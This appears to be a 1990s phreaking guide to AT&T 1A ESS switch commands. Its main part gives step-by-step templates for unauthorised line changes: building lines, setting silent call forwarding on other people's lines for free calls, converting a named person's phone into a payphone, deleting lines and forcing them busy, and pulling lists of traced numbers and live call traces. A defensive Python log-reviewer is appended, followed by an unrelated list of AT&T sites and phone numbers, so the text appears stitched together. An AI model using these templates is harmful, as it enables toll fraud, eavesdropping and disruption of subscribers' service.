VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC!   Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS!      Display last features.

Call Features

CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't Answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrex (unremarkable)
CPU- centrex (unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
FRE- Free Calling

The standard output of a command appears below. The 'DN 348 2141' specifies the number you are checking. The calling features will be listed on the second line by their three letter acronyms. This line has call waiting (CWT), a trace (TRC), and touch tone dialing (TTC).

Example of 1A output:

M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC

Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=

The VFY command can be used to check if a line is in use. The output will list the LEN (Line Equipment Number) for the line and its call features in octal. If the LEN is all zeros, then that number has not been assigned. Replace XXXXXXX with the number you wish to check. You must prefix the phone number with 30. You can also check for unused LENs using the VFY command. Use the space bar to stop scrolling and the V-STOP command to cancel when looking up free LENs.

VFY-DN-30XXXXXXX.       Search for free lines.
VFY-LEN-4100000000.     List all free LENs.
VFY-TNN-XXXXXXXX.       To get information on trunk.

The output for the VFY-DN command will appear like the one below. Notice that this number has been assigned a LEN so it is in use.

M 06 TR01 796 9146 0 0 0 0
LEN 01 025 000 001 000 000 000 000 000 4 000 000 000 000 000 000 000 000 0 0 0 0 0 0 0 0 0

Searching for a Particular Feature on a Line (like trace)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

All line information is stored in the switch for its coverage area. The switch is like a huge database in this sense. You can do global searches on the switch for any feature. One especially interesting feature to search for is traced numbers. Traced numbers listed this way are INTERNALLY traced as opposed to globally traced numbers shown with the CI-LIST- command. Global and internal trace lists are always very different. And remember, be a good samaritan and call the person being traced and let them know! ;-)

VF:DNSVY:FEATRS,EXMATCH TRACE!
Pull all numbers IN switch area with trace on it (takes a sec).

You can EXMATCH for any LASS feature by replacing the keyword TRACE with any call feature like call forwarding (CFB) and speed calling (SC1).

To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Another nice use for the VFY command is to see what is on a line's speed calling list. Replace XXXXXXX with the target phone number. One devious use is to look at the CO's speed call list to find other internal telco numbers.

VFY-LIST-09XXXXXXX020000

09=mask
02=single list (one digit speed calling)
20=double list (two digit speed calling)
28=  "    "
36=  "    "
44=  "    "

To Build a Line
-=-=-=-=-=-=-=-

The recent change command (RC) is used to create and modify lines. Because RC commands are usually very long and complex, they are typed on multiple lines to simplify them. Each subfield of the data section of the command is typed on a separate line ended by a backslash (\) followed by pressing ctrl-d. To create a line, you specify LINE in the identification field. Before a line can be created, you must first locate an unused number by using the VFY-DN command explained above. Once a free number has been found, you use the VFY-LEN to find an available LEN.

To build a new line, follow these steps: First, find a spare LEN (VFY-LEN-4100000000.). Next find a free line. Now type in the RC commands using the following commands as a template:

RC:LINE:\           (create a line)
ORD 1\              (execute the command immediately)
TN XXXXXXX\         (telephone number)
LEN XXXXXXXX\       (LEN found from above)
LCC 1FR\            (line class code 1FR)
CFV\                (call forward)
XXX 288\            (type XXX, space, then the three digit PIC)
                    (LD carrier - 222 - MCI, 288 - AT&T, 333 - Sprint, etc.)
!                   (BEWM, don't forget the ctrl-d!!)

(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE has taken effect)

Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The call forwarding feature is the most important feature for hackers.
By creating a line or modifying an existing line with call forwarding, you can then use it to make free phone calls. You set the line to call forward/no ring and then give it the call forwarded number. This will allow you to call the modified line and be instantly forwarded to your pre-chosen destination. First create a line using RC:LINE:, then modify the line using the following commands as a template.

RC:CFV:\            (add call forwarding to a line.. begin: )
ORD 1\              (execute the command immediately)
BASE XXXXXXX\       (base number you are changing)
TO XXXXXXX\         (local - XXXXXXX : LD - XXXXXXXXXX )
PFX\                (set prefix to 1 if LD)
!                   (BEWM)

To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

It is safer to modify an existing call forward than to create a new line solely for this purpose. You can use the VFY command and EXMATCH for CFB to find lines with call forwarding. Before you can change the call forwarding 'TO' number you must delete the old one. Remove the call forward number using CFV;OUT with the template below.

RC:CFV;OUT:\        (remove call forward number...begin: )
ORD 1\              (execute command immediately)
BASE XXXXXXX\       (number to remove it from)
!                   (Yeeee-Hahhhahah)

Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=

The only drawback to call forwarding off someone's line is that if it rings they might answer. To get around this, you add the call-forward no-ring option (ICFRR) using the following as a template.

RC:LINE;CHG:\       (recent change line to be specified)
ORD 1\              (execute command immediately)
TN XXXXXXX\         (number you wanna fuck with)
ICFRR\              (this takes the ring off)
!                   (Go!)

Adding a Feature to a Line
-=-=-=-=-=-=-=-=-=-=-=-=-=

The RC:LINE;CHG: can also be used to add any other call feature. Use the same template but change the feature.

RC:LINE;CHG:\       (this is used for changing features)
ORD 1\              (order number)
TN XXXXXXX\         (telephone number you are fucking with)
TWC\                (replace this with any feature you wish)
!                   (Fire!)
Removing a Feature
-=-=-=-=-=-=-=-=-=

Use the NO delimiter to remove a feature from a line.

RC:LINE;CHG:\       (change a feature)
ORD 1\              (effective immediately)
TN XXXXXXX\         (telephone number)
CFV NO\             (feature followed by NO)
!                   (Boo-Ya!)

Change Phone Number into Payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

You've read about it in The Hacker Crackdown, now you too can be 31337 and change Gail Thackeray's phone into a payphone. In fact you can change the line class code (LCC) to anything you want. To display the LCC of a line use the following and replace the XXXXXXX with the line you wish to view.

VF:DNSVY:LCC,DN XXXXXXX,1,PIC!      (display line class code)

DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless (ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)
(ANI6 and ANI7 - only good for DMS)

To change the line into a payphone use the RC:LINE;CHG command and modify the LCC like the example below.

RC:LINE;CHG:\       (this is used for changing features)
ORD 1\              (order number)
TN XXXXXXX\         (telephone number you are fucking with)
LCC DTF\            (line class code you are changing to)
!                   (Make it so.)

*(You may have to remove some LASS features when doing this)*

To Kill a Line and Remove It Permanently
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If you need to delete a line you have created (or haven't) use the following syntax.

RC:LINE;OUT:\       (remove line)
ORD 1\              (effective immediately)
TN XXXXXXX\         (on this number)
!                   (GO!)

Monitoring Phone Calls
-=-=-=-=-=-=-=-=-=-=-=

There are powerful utilities available on a 1A to monitor calls and affect phone lines. The T-DN- commands allow you to check the current status of a line and make it busy or idle. If a line happens to be active you can use the NET-LINE- command to trace the call and find the numbers for both calling parties.

T-DN-RD XXXXXXX.        See if call in progress.
                        output: =1 line busy, =0 line idle
T-DN-MB XXXXXXX.        Make line busy.
T-DN-MI XXXXXXX.        Make line idle.
NET-LINE-XXXXXXX0000.   To do a live trace on a phone number thru switch.
NET-TNN-XXXXXX          Same as above for trunk trace

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Appendix 1 - Common output messages seen on 1A switches
-=-=-=-=-=

** ALARM **
AR01  Office alarm
AR02  Alarm retired or transferred
AR03  Fuse blown
AR04  Unknown alarm scan point activated
AR05  Commercial power failure
AR06  Switchroom alarm via alarm grid
AR07  Power plant alarm
AR08  Alarm circuit battery loss
AR09  AMA bus fuse blown
AR10  Alarm configuration has been changed (retired, inhibited)
AR11  Power converter trouble
AR13  Carrier group alarm
AR15  Hourly report on building and power alarms

** AUTOMATIC TRUNK TEST **
AT01  Results of trunk test

** CARRIER GROUP **
CG01  Carrier group in alarm
CG03  Reason for above

** COIN PHONE **
CN02  List of pay phones with coin disposal problems
CN03  Possible trouble
CN04  Phone taken out of restored service because of possible coin fraud

** COPY **
COPY  Data copied from one address to another

** CALL TRACE **
CT01  Manually requested trace line to line, information follows
CT02  Manually requested trace line to trunk, information follows
CT03  Intraoffice call placed to a number with CLID
CT04  Interoffice call placed to a number with CLID
CT05  Call placed to number on the CI list
CT06  Contents of the CI list
CT07  ACD related trace
CT08  ACD related trace
CT09  ACD related trace

** DIGITAL CARRIER TRUNK **
DCT COUNTS  Count of T carrier errors

** MEMORY DIAGNOSTICS **
DGN   Memory failure in cs/ps diagnostic program

** DIGITAL CARRIER "FRAME" ERRORS **
FM01  DCT alarm activated or retired
FM02  Possible failure of entire bank not just frame
FM03  Error rate of specified digroup
FM04  Digroup out of frame more than indicated
FM05  Operation or release of the loop terminal relay
FM06  Result of digroup circuit diagnostics
FM07  Carrier group alarm status of specific group
FM08  Carrier group alarm count for digroup
FM09  Hourly report of carrier group alarms
FM10  Public switched digital capacity failure
FM11  PUC counts of carrier group errors

** MAINTENANCE **
MA02  Status requested, print out of MACII scratch pad
MA03  Hourly report of system circuits and units in trouble
MA04  Reports condition of system
MA05  Maintenance interrupt count for last hour
MA06  Scanners, network and signal distributors in trouble
MA07  Successful switch of duplicated unit (program store etc.)
MA08  Excessive error rate of named unit
MA09  Power should not be removed from named unit
MA10  OK to remove paper
MA11  Power manually removed from unit
MA12  Power restored to unit
MA13  Indicates central control active
MA15  Hourly report of # of times interrupt recovery program acted
MA17  Centrex data link power removed
MA21  Reports action taken on MAC-REX command
MA23  4 minute report, emergency action phase triggers are inhibited

** MEMORY **
MN02  List of circuits in trouble in memory

** NETWORK TROUBLE **
NT01  Network frame unable to switch off line after fault detection
NT02  Network path trouble Trunk to Line
NT03  Network path trouble Line to Line
NT04  Network path trouble Trunk to Trunk
NT06  Hourly report of network frames made busy
NT10  Network path failed to restore

** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC      Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS   Call store status
OP:DUSTATUS   Data unit status
OP:ERAPDATA   Error analysis database output
OP:INHINT     Hourly report of inhibited devices
OP:LIBSTAT    List of active library programs
OP:OOSUNITS   Units out of service
OP:PSSTATUS   Program store status

** PLANT MEASUREMENTS **
PM01  Daily report
PM02  Monthly report
PM03  Response to a request for a specific section of report
PM04  Daily summary of IC/IEC irregularities

** REPORT **
REPT:ADS FUNCTION                Reports that an ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED  No ADS assigned
REPT:ADS FUNCTION SIMPLEX        Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE   Change in state of ADS
REPT:ADS PROCEDURAL ERROR        You fucked up
REPT:LINE TRBL                   Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL        System programs that are off or on
REPT:RC CENSUS                   Hourly report on recent changes
REPT:RC SOURCE                   Recent change system status (RCS=1 means RC channel inhibited)

** RECENT CHANGE **
RC18  RC message response

** REMOVE **
RMV   Removed from service

** RESTORE **
RST   Restored to service status

** RINGING AND TONE PLANT **
RT04  Status of monitors

** SOFTWARE AUDIT **
SA01  Call store memory audit results
SA03  Call store memory audit results

** SIGNAL IRREGULARITY **
SIG IRR            Blue box detection
SIG IRR INHIBITED  Detector off
SIG IRR TRAF       Half hour report of traffic data

** TRAFFIC CONDITION **
TC15  Reports overall traffic condition
TL02  Reason test position test was denied
TL03  Same as above

** TRUNK NETWORK **
TN01  Trunk diagnostic found trouble
TN02  Dial tone delay alarm failure
TN04  Trunk diag request from test panel
TN05  Trunk test procedural report or denials
TN06  Trunk state change
TN07  Response to a trunk type and status request
TN08  Failed incoming or outgoing call
TN09  Network relay failures
TN10  Response to TRK-LIST input, usually a request from test position
TN11  Hourly, status of trunk undergoing tests
TN16  Daily summary of precut trunk groups

** TRAFFIC OVERLOAD CONDITION **
TOC01  Serious traffic condition
TOC02  Reports status of less serious overload conditions

** TRANSLATION ** (shows class of service, calling features etc.)
TR01  Translation information, response to VFY-DN
TR03  Translation information, response to VFY-LEN
TR75  Translation information, response to VF:DNSVY

** **
TW02  Dump of octal contents of memory

Trace Output Appearance (COT - Customer Oriented Trace)

A 03 CT04 22 03 02 05 11 26 359 705 8500   <-- NUMBER CALLED
CPN 212 382 8923                           <-- WHO CALLED
01/14/95 22:03:02                          <-- TIME/DATE
#236                                       <-- JOB NUMBER

Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
-=-=-=-=-=

RMV::NPC 69!
UTL::QRY.CMAP 136!
UTL::QRY.SCON to 135!               (as far out as to 12003!)
UTL::QRY.SCON 13615/01!
UTL::QRY.ALMS!
UTL::QRY,WHO!
UTL::QRY,ALL!
UTL::QRY,FPKG!
UTL::QRY,UNIT1,FTMI1, EQL
GRTH::UNIT1! (FT100)                <-- comment written by command
GRTH::UNI1,FTMI1, EQL(L,R) (2,2)    <-- Example
UTL::QRY.!
RMV::LINK 3!
DGN::LINK 3!
RST::LINK 3!
UTL::QRY.TPS!
RST::TAPE!                          (This and the next two commands were
UTL::BMTR.FROM DISK.TO TAPE!         ALWAYS found together, and are pretty
RMV::TAPE!                           obvious)
SDIS::FROM 11204/03.TO 11204/04!
UTL::QRY.SCON.CH.TO 11204!
UTL::QRY.CMAP.TO 11204/03!
UTL::QRY,CMAP 01117!
SCON::RATE 96.FROM 11204/03.TO 11204/4!
LOGIN::USER DAX\
UTL::EQD,NPCS!
ADD::LINK 2,NPCAD E!
UTL::LOC,ETSI 101!
              |_|____________Bay     (These show physical locations
                |____________Unit     of trunks)
UTL::LOC,NPC 01117!
output - 1-01-38
         |__|__|_________Bay
            |__|_________Unit
               |_________38 (1/8) inches

Appendix 3 - Suggested reading
-=-=-=-=-=

Acronyms 1988 (Phrack #20, file 11)
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
ESS & 1A Switching Systems by Ninja Master
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
Operator Services Position System by Bandito (Phun #5, file 8)
Peering Into the Soul of ESS by Jack the Ripper (Phun #5, file 2)

__________________________________________________________________________
(C)opywrong 1995, DeadKat Inc. All wrongs denied.
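The command grammar laid out above (action:identification:data fields, a period for verification commands and a ballbat for change commands, backslash-continued RC orders closed by a lone "!") and the output-message codes in Appendix 1 are enough to write a small reviewer for a 1A terminal log, which is what a CO technician auditing a session printout would reach for (the REPT:RC CENSUS hourly report exists for the same reason). The following is an added example, not code from the article and not any Bell System or telco tool; the session log it parses is constructed from the article's own examples (the TR75 feature line, the RC:LINE;CHG template and the CT04 trace record), and every function and name in it (review, parse_command, audit_flags, TraceRecord) is this example's own.

```python
# Added example, not from the article: a reviewer for 1AESS terminal logs.
# It splits each command into the action / identification / data fields the
# text describes, classifies it by terminator ('.' verify, '!' change),
# reassembles multi-line recent-change orders ('\'-continued lines up to the
# closing '!'), looks up output-message codes (Appendix 1) and decodes the
# four-line CT04 Customer Oriented Trace record. All names are this example's.
import re
from dataclasses import dataclass
from typing import Dict, List

TERMINATORS = {".": "verify", "!": "change"}
MSG_RE = re.compile(r"^[AM] \d+ ([A-Z]{2,4}\d{2})\b")   # e.g. "M 53 TR75 ..."
MESSAGE_CODES = {                                       # subset of Appendix 1
    "TR01": "Translation information, response to VFY-DN",
    "TR75": "Translation information, response to VF:DNSVY",
    "CT04": "Interoffice call placed to a number with CLID",
    "RC18": "RC message response",
}


@dataclass
class Command:
    action: str
    identification: List[str]   # subfields, split on ';'
    data: List[str]             # keyword units
    kind: str                   # 'verify' or 'change'


@dataclass
class TraceRecord:
    called: str
    calling: str
    timestamp: str
    job: str


def parse_command(head: str, units: List[str], kind: str) -> Command:
    """head is the command without its terminator; units are its continuation lines."""
    # colon syntax ACTION:IDENT:DATA, or the older hyphen syntax VFY-DN-30XXXXXXX
    parts = head.split(":", 2) if ":" in head else head.split("-", 2)
    ident = [s.strip() for s in parts[1].split(";")] if len(parts) > 1 and parts[1].strip() else []
    data = ([parts[2].strip()] if len(parts) > 2 and parts[2].strip() else []) + list(units)
    return Command(parts[0].strip(), ident, data, kind)


def parse_trace(rec: List[str]) -> TraceRecord:
    """rec: the four lines of a CT04 record (header, CPN, time/date, job number)."""
    head, cpn = rec[0].split(), rec[1].split()
    return TraceRecord(called=" ".join(head[-3:]), calling=" ".join(cpn[1:]),
                       timestamp=rec[2].strip(), job=rec[3].strip().lstrip("#"))


def audit_flags(cmd: Command) -> List[str]:
    """Points a reviewer of the log would want called out."""
    flags = []
    if cmd.kind == "change" and cmd.action == "RC":
        flags.append("recent-change order")
        if "OUT" in cmd.identification:
            flags.append("removal (RC ...;OUT)")
        if any(u.startswith("LCC ") for u in cmd.data):
            flags.append("line class code change")
        if cmd.identification[:1] == ["CFV"] or any(u.split()[0] in ("CFV", "ICFRR") for u in cmd.data if u):
            flags.append("call forwarding change")
    if cmd.action in ("MON", "STOP") and any(s.startswith("CHAN") for s in cmd.identification):
        flags.append("terminal channel redirect")
    if cmd.action in ("T", "NET"):
        flags.append("line state / live trace command")
    return flags


def review(log: str) -> Dict[str, list]:
    """Walk a session log; return parsed commands, output messages, traces and flagged commands."""
    lines = [ln.strip() for ln in log.splitlines()]
    commands, messages, traces = [], [], []
    head, units, i = None, [], 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        m = MSG_RE.match(line)
        if m and head is None:                 # switch output message
            code = m.group(1)
            messages.append((code, MESSAGE_CODES.get(code, "unknown message code")))
            if code == "CT04" and i + 2 < len(lines):
                traces.append(parse_trace(lines[i - 1:i + 3]))
                i += 3
        elif head is None:
            if line.endswith("\\"):            # first line of a multi-line order
                head, units = line[:-1], []
            elif line[-1] in TERMINATORS:      # single-line command
                commands.append(parse_command(line[:-1], [], TERMINATORS[line[-1]]))
            # anything else is output text (e.g. the feature line "CWT TRC TTC")
        elif line in TERMINATORS:              # terminator closing the order
            commands.append(parse_command(head, units, TERMINATORS[line]))
            head = None
        else:
            units.append(line[:-1] if line.endswith("\\") else line)
    flagged = [(c, f) for c in commands for f in [audit_flags(c)] if f]
    return {"commands": commands, "messages": messages, "traces": traces, "flagged": flagged}


# Constructed session log assembled from the article's own examples.
SESSION_LOG = r"""
WHO-RV-.
VF:DNSVY:FEATRS,DN 3482141,1,PIC!
M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC
OP:CHAN:MON!
MON:CHAN SC1;CHAN LOC!
RC:LINE;CHG:\
ORD 1\
TN 3482141\
LCC DTF\
!
A 03 CT04 22 03 02 05 11 26 359 705 8500
CPN 212 382 8923
01/14/95 22:03:02
#236
"""

if __name__ == "__main__":
    result = review(SESSION_LOG)
    for cmd, flags in result["flagged"]:
        print(cmd.action, cmd.identification, cmd.data, "->", ", ".join(flags))
    for t in result["traces"]:
        print(f"CT04 trace #{t.job}: CPN {t.calling} -> {t.called} at {t.timestamp}")
```

Run on the constructed log, the reviewer reports the MON:CHAN redirect and the RC:LINE;CHG order that rewrote a line class code, and decodes the trace record into calling and called numbers; the VF:DNSVY query, although it ends in a ballbat, is left unflagged because the flags are keyed on the action field rather than the terminator alone.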
=========

                +-----------------------------+
                | Thank you for abusing AT&T  |
                +-----------------------------+
                            Part II
                      by Major & Dead Kat

Some of the "Frequently Visited AT&T Locations":

LOCATION                                    CITY       ST/ZIP     TELEPHONE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~  ~~~~~~~~   ~~~~~~~~~~~
AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000
BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300
MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200
AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000
LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411
AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000
PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000
AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100
PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799
LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000
CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200
AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223
AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390
VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611
AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649
AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200
AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000
AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200
SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000
HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000
AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000
AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000
SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300
AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800
PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911
AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600
DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000
AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000
AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000
AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001
DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200
DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200
AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813
AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011
AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100
AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000
AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800
AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200
AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800
ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721
CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070
AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600
AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300
WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000
AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000
AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454
AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200
AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200
AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400
AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000
AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000
AT&T MICROELECT. 9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000
AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100
AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100
ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000
AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200
AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000
AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000
ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000
ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000
AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126
ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000
ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900
AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800
ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100
ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000
AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200
AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300
ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000
AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300
AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000
AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100
AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100
AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000
AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320
UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900
NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000
NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000
LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005
AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000
CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000
MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000
WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000
INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000
IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000
AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558
AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674
INDIANAPOLIS INST. 8700 ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160
INDIANA AMO N. 151 N.DELAWARE ST. SUITE 565 INDIANAPOL IN 46204 317-632-9161
INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011
INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980
AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000
KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000
AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840
AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500
AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000
AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300
AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600
AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041
SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000
AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400
AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161
ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000
AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600
MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000
AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800
AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870
AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000
NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765
AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000
